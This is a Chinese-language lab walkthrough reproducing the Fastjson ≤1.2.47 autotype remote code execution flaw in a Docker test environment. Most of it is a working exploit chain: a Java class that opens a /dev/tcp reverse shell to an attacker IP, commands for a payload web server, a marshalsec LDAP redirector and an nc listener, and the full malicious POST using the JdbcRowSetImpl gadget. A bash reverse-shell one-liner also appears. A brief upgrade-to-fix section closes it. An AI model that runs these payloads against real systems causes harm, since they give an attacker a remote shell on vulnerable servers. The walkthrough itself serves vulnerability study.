Fastjson≤1.2.47 RCE

Fastjson≤1.2.47 RCE

一、漏洞介绍

fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。
首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson 1.2.47及以下版本中,利用其缓存机制可实现对未开启autotype功能的绕过。

影响版本:
Fastjson1.2.47以及之前的版本

二、漏洞危害

远程命令执行。

三、漏洞验证

环境搭建:

实验环境 系统 IP地址
攻击机 win10 192.168.134.130
靶机 Centos7 192.168.134.133
docker pull vulhub/fastjson     #拉取镜像
docker run -d -p 8080:8080 -p 8443:8443 initidc/fastjson1.2.47_rce    #连接容器

验证一下环境是否正常:
在这里插入图片描述
Fastjson≤1.2.47 RCE_第1张图片

漏洞复现

编译生成payload

首先将以下代码保存为Exploit.java(反弹shell命令在代码内,可自行调整)

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/192.168.134.130/1888;cat <&5 | while read line; do $line 2>&5 >&5; done"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}

然后编译Exploit.java,会生成一个Exploit.class文件:

javac Exploit.java

Fastjson≤1.2.47 RCE_第2张图片

攻击机配置
  1. 使用python搭建一个临时的web服务(执行命令的目录即为web根目录):

    python2 -m SimpleHTTPServer  1111
    

    在这里插入图片描述
    Fastjson≤1.2.47 RCE_第3张图片
    然后将编译生成的Exploit.class文件放至web目录下,即浏览器访问会下载
    Fastjson≤1.2.47 RCE_第4张图片

    此步是为了接收LDAP服务重定向请求,需要在payload的目录下开启此web服务,这样才可以访问到payload文件。

  2. 服务器使用marshalsec开启LDAP服务监听:

    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.134.130:1111/#Exploit 9999
    

    在这里插入图片描述

    使用marshalsec工具快捷的开启LDAP服务,借助LDAP服务将LDAP reference result 重定向到web服务器

  3. nc监听

    nc -lvp 1888
    

最后访问fastjson页面,使用Burp抓包,改为POST请求,使用EXP

POST /fastjson/ HTTP/1.1
Host: 192.168.134.133:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 272

{
    "name":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "x":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://192.168.134.130:9999/Exploit",
        "autoCommit":true
    }
 
}

发送后可以看到第三个窗口成功得到shell
Fastjson≤1.2.47 RCE_第5张图片

注意:

  1. 在使用LDAP服务反弹shell用的命令不能直接使用
    bash -i >& /dev/tcp/xx.xx.xx.xx/1888 0>&1
  2. jdk版本一定要注意!
    启动服务之前用 java -version查看自己的jdk版本是否低于以下jdk版本
    Fastjson≤1.2.47 RCE_第6张图片

四、漏洞修复

将Fastjson升级到最新版本
https://github.com/alibaba/fastjson

参考链接:
https://github.com/CaijiOrz/fastjson-1.2.47-RCE
https://github.com/ianxtianxt/Fastjson-1.2.47-rce

你可能感兴趣的:(漏洞复现)